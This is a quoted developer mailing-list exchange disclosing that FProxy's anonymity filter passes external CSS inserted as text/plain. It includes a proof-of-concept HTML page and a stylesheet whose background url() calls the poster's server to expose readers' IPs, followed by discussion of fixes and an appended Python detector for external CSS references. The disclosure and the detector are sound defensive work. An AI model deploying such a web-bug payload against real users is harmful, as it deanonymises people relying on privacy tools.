>
> After reading Cruft's short blurb about external CSS style sheets, I hacked
> around to see if FProxy would accept external style sheets.
>
> Inserting the style sheets as *.css doesn't work, because FProxy doesn't
> recognise the content-type as safe and trips the anonymity filter.
> Inserting them as text/plain does work, though.
>
> In fact, it does work so well that one can specify an external background
> image in the stylesheet and FProxy doesn't warn the user. CSS-capable
> browsers will parse the stylesheet and fetch the background image from the
> WWW server, thus compromising the user's anonymity.
>
> I've inserted two keys to demonstrate this:
>
> freenet:KSK@css_web_bug.txt
> freenet:KSK@css_web_bug.html
>
> The demonstration will attempt to contact my site
> (http://nightwatch.mine.nu) for the external image.
>
> Here are the files in plaintext for those who don't want their IP to show up
> on my server logs:
>
> --css_web_bug.html--
> <html>
> <head>
> <title>Blah</title>
> <link rel="stylesheet" type="text/css" href="/KSK@css_web_bug.txt">
Does the type= attribute occur in any other tag? Have you looked at
XPath etc? Some of the XML stuff allows arbitrary inlining... does it
have a type= switch?
> </head>
> <body>
> <h1>Foo</h1>
> Foo
> <h2>Bar</h2>
> </body>
> </html>
> --css_web_bug.html--
>
> --css_web_bug.txt--
> body {
> color: white;
> background: url(http://nightwatch.mine.nu/graphics/back.gif);
Is this the only way to specify a URL in CSS code? Inline CSS should be
reasonably easy to filter if so.
> }
> --css_web_bug.txt--
>
> --
> Mika Hirvonen <hirvox at welho.com>
> http://nightwatch.mine.nu
>
Nice.. a major pain. It would be really annoying to have to block all
CSS, so we end up parsing the inline style sheet before we let them have
the page (since it might already be in the browser's cache, eg from a node
restart, or invisible inlining as another format etc)... worse, what if
the browser reloads the stylesheet and gets a later edition? Not allowing
external stylesheets undermines the C in CSS, but it may be the only
practical solution, short of a special browser or browser switch.
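
As an added illustration (not from the thread and not FProxy's own code), this Python function lists the URLs a stylesheet names through `url()` and `@import`, and flags those that would make the browser contact a host outside the proxy. It assumes regex matching over the text rather than a full CSS parser; the `@import` line, the `example.invalid` host and the local image name in the sample are constructed.

```python
import re

# Constructed sample: the stylesheet from the post plus an @import line
# and a local reference, added here to show the other cases.
SAMPLE_CSS = """
@import "http://example.invalid/other.css";
body {
  color: white;
  background: url(http://nightwatch.mine.nu/graphics/back.gif);
}
h1 { background: url('/KSK@local_image.png'); }
"""

_COMMENT = re.compile(r"/\*.*?\*/", re.S)
_HEX_ESCAPE = re.compile(r"\\([0-9a-fA-F]{1,6})[ \t\r\n\f]?")
_CHAR_ESCAPE = re.compile(r"\\([^\r\n\f0-9a-fA-F])")
# url(...) with optional quotes, or @import followed by a quoted string.
_URL_FUNC = re.compile(r"url\(\s*(?:\"([^\"]*)\"|'([^']*)'|([^)\s]*))\s*\)", re.I)
_IMPORT_STR = re.compile(r"@import\s+(?:\"([^\"]*)\"|'([^']*)')", re.I)
# A scheme ("http:") or a protocol-relative "//" takes the request off the proxy.
_EXTERNAL = re.compile(r"^\s*(?:[a-z][a-z0-9+.\-]*:|//)", re.I)


def _decode_escapes(css):
    """Resolve CSS backslash escapes so 'u\\72l(' is seen as 'url('."""
    def hex_to_char(m):
        cp = int(m.group(1), 16)
        return chr(cp) if 0 < cp <= 0x10FFFF else "\ufffd"
    css = _HEX_ESCAPE.sub(hex_to_char, css)
    return _CHAR_ESCAPE.sub(r"\1", css)


def css_references(css):
    """Return every URL named by url() or @import, in document order."""
    css = _decode_escapes(_COMMENT.sub(" ", css))
    found = []
    for pattern in (_IMPORT_STR, _URL_FUNC):
        for m in pattern.finditer(css):
            found.append((m.start(), next(g for g in m.groups() if g is not None)))
    return [url for _, url in sorted(found)]


def external_references(css):
    """Subset of css_references() that would make the browser leave the proxy."""
    return [u for u in css_references(css) if _EXTERNAL.match(u)]
```
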